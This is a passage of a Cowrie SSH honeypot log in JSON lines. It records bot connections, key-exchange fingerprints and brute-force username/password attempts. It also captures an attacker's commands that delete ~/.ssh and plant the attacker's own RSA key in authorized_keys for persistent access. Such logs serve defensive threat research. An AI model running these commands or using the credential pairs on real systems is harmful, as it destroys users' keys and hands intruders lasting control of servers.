256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:57:41.578706Z","src_ip":"212.227.235.229","session":"be3fb035ce1c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:57:42.098941Z","src_ip":"212.227.235.229","session":"be3fb035ce1c"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:57:42.221036Z","src_ip":"212.227.235.229","session":"e69ee1f270dd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:57:42.221976Z","src_ip":"212.227.235.229","session":"be3fb035ce1c"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":34948,"dst_ip":"1.2.3.4","dst_port":22,"session":"3737b634f9a6","protocol":"ssh","message":"New connection: 158.51.124.56:34948 (1.2.3.4:22) [session: 3737b634f9a6]","sensor":"my-vps","timestamp":"2025-09-08T14:58:10.437495Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:58:10.438362Z","src_ip":"158.51.124.56","session":"3737b634f9a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:58:10.576683Z","src_ip":"158.51.124.56","session":"3737b634f9a6"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T14:58:11.171499Z","src_ip":"158.51.124.56","session":"3737b634f9a6"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:58:12.312379Z","src_ip":"158.51.124.56","session":"3737b634f9a6"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":43966,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e53351f0c5a","protocol":"ssh","message":"New connection: 185.255.91.51:43966 (1.2.3.4:22) [session: 3e53351f0c5a]","sensor":"my-vps","timestamp":"2025-09-08T14:58:17.217516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:58:17.220498Z","src_ip":"185.255.91.51","session":"3e53351f0c5a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:58:17.316460Z","src_ip":"185.255.91.51","session":"3e53351f0c5a"}
{"eventid":"cowrie.login.failed","username":"hammer","password":"111","message":"login attempt [hammer/111] failed","sensor":"my-vps","timestamp":"2025-09-08T14:58:17.743464Z","src_ip":"185.255.91.51","session":"3e53351f0c5a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:58:18.842127Z","src_ip":"185.255.91.51","session":"3e53351f0c5a"}
{"eventid":"cowrie.session.connect","src_ip":"117.72.74.154","src_port":48396,"dst_ip":"1.2.3.4","dst_port":22,"session":"b336f328ea69","protocol":"ssh","message":"New connection: 117.72.74.154:48396 (1.2.3.4:22) [session: b336f328ea69]","sensor":"my-vps","timestamp":"2025-09-08T14:58:28.212513Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:58:28.213426Z","src_ip":"117.72.74.154","session":"b336f328ea69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44130,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c89e0c197b2","protocol":"ssh","message":"New connection: 212.227.235.229:44130 (1.2.3.4:22) [session: 9c89e0c197b2]","sensor":"my-vps","timestamp":"2025-09-08T14:58:29.436190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:58:29.437706Z","src_ip":"212.227.235.229","session":"9c89e0c197b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:58:29.585769Z","src_ip":"212.227.235.229","session":"9c89e0c197b2"}
{"eventid":"cowrie.login.success","username":"root","password":"cdn123","message":"login attempt [root/cdn123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:58:30.208498Z","src_ip":"212.227.235.229","session":"9c89e0c197b2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:58:30.517253Z","src_ip":"212.227.235.229","session":"9c89e0c197b2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:58:30.518000Z","src_ip":"212.227.235.229","session":"9c89e0c197b2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:58:30.519183Z","src_ip":"212.227.235.229","session":"9c89e0c197b2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:58:30.667036Z","src_ip":"212.227.235.229","session":"9c89e0c197b2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:58:31.060161Z","src_ip":"212.227.235.229","session":"9c89e0c197b2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:58:31.060920Z","src_ip":"212.227.235.229","session":"9c89e0c197b2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:58:31.209026Z","src_ip":"212.227.235.229","session":"9c89e0c197b2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:58:31.210094Z","src_ip":"212.227.235.229","session":"9c89e0c197b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44632,"dst_ip":"1.2.3.4","dst_port":22,"session":"3edc64bf9248","protocol":"ssh","message":"New connection: 212.227.235.229:44632 (1.2.3.4:22) [session: 3edc64bf9248]","sensor":"my-vps","timestamp":"2025-09-08T14:58:31.349796Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:58:31.350552Z","src_ip":"212.227.235.229","session":"3edc64bf9248"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:58:31.494468Z","src_ip":"212.227.235.229","session":"3edc64bf9248"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:58:32.109891Z","src_ip":"212.227.235.229","session":"3edc64bf9248"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:58:33.256247Z","src_ip":"212.227.235.229","session":"3edc64bf9248"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45190,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb3e04814e85","protocol":"ssh","message":"New connection: 212.227.235.229:45190 (1.2.3.4:22) [session: eb3e04814e85]","sensor":"my-vps","timestamp":"2025-09-08T14:58:33.404018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:58:33.404881Z","src_ip":"212.227.235.229","session":"eb3e04814e85"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:58:33.551136Z","src_ip":"212.227.235.229","session":"eb3e04814e85"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:58:34.179943Z","src_ip":"212.227.235.229","session":"eb3e04814e85"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:58:34.328223Z","src_ip":"212.227.235.229","session":"9c89e0c197b2"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:58:34.329045Z","src_ip":"212.227.235.229","session":"eb3e04814e85"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34624,"dst_ip":"1.2.3.4","dst_port":22,"session":"1114c780c3d4","protocol":"ssh","message":"New connection: 212.227.235.229:34624 (1.2.3.4:22) [session: 1114c780c3d4]","sensor":"my-vps","timestamp":"2025-09-08T14:58:47.557235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:58:47.558177Z","src_ip":"212.227.235.229","session":"1114c780c3d4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:58:47.677477Z","src_ip":"212.227.235.229","session":"1114c780c3d4"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T14:58:48.197694Z","src_ip":"212.227.235.229","session":"1114c780c3d4"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:58:49.320891Z","src_ip":"212.227.235.229","session":"1114c780c3d4"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":60742,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f1b7bdf0852","protocol":"ssh","message":"New connection: 158.51.124.56:60742 (1.2.3.4:22) [session: 0f1b7bdf0852]","sensor":"my-vps","timestamp":"2025-09-08T14:59:15.859724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:59:15.860846Z","src_ip":"158.51.124.56","session":"0f1b7bdf0852"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:59:15.998314Z","src_ip":"158.51.124.56","session":"0f1b7bdf0852"}
{"eventid":"cowrie.login.failed","username":"dmdba","password":"12345","message":"login attempt [dmdba/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T14:59:16.551026Z","src_ip":"158.51.124.56","session":"0f1b7bdf0852"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:59:17.691330Z","src_ip":"158.51.124.56","session":"0f1b7bdf0852"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":41430,"dst_ip":"1.2.3.4","dst_port":22,"session":"3761b0d6250b","protocol":"ssh","message":"New connection: 185.255.91.51:41430 (1.2.3.4:22) [session: 3761b0d6250b]","sensor":"my-vps","timestamp":"2025-09-08T14:59:33.992547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:59:33.996083Z","src_ip":"185.255.91.51","session":"3761b0d6250b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:59:34.092744Z","src_ip":"185.255.91.51","session":"3761b0d6250b"}
{"eventid":"cowrie.login.failed","username":"webguest","password":"changeme","message":"login attempt [webguest/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T14:59:34.481967Z","src_ip":"185.255.91.51","session":"3761b0d6250b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:59:35.584010Z","src_ip":"185.255.91.51","session":"3761b0d6250b"}
{"eventid":"cowrie.session.connect","src_ip":"117.156.96.5","src_port":49598,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc88060a4bb1","protocol":"ssh","message":"New connection: 117.156.96.5:49598 (1.2.3.4:22) [session: bc88060a4bb1]","sensor":"my-vps","timestamp":"2025-09-08T14:59:37.601812Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39266,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3f56f0036c5","protocol":"ssh","message":"New connection: 212.227.235.229:39266 (1.2.3.4:22) [session: f3f56f0036c5]","sensor":"my-vps","timestamp":"2025-09-08T14:59:56.001218Z"}
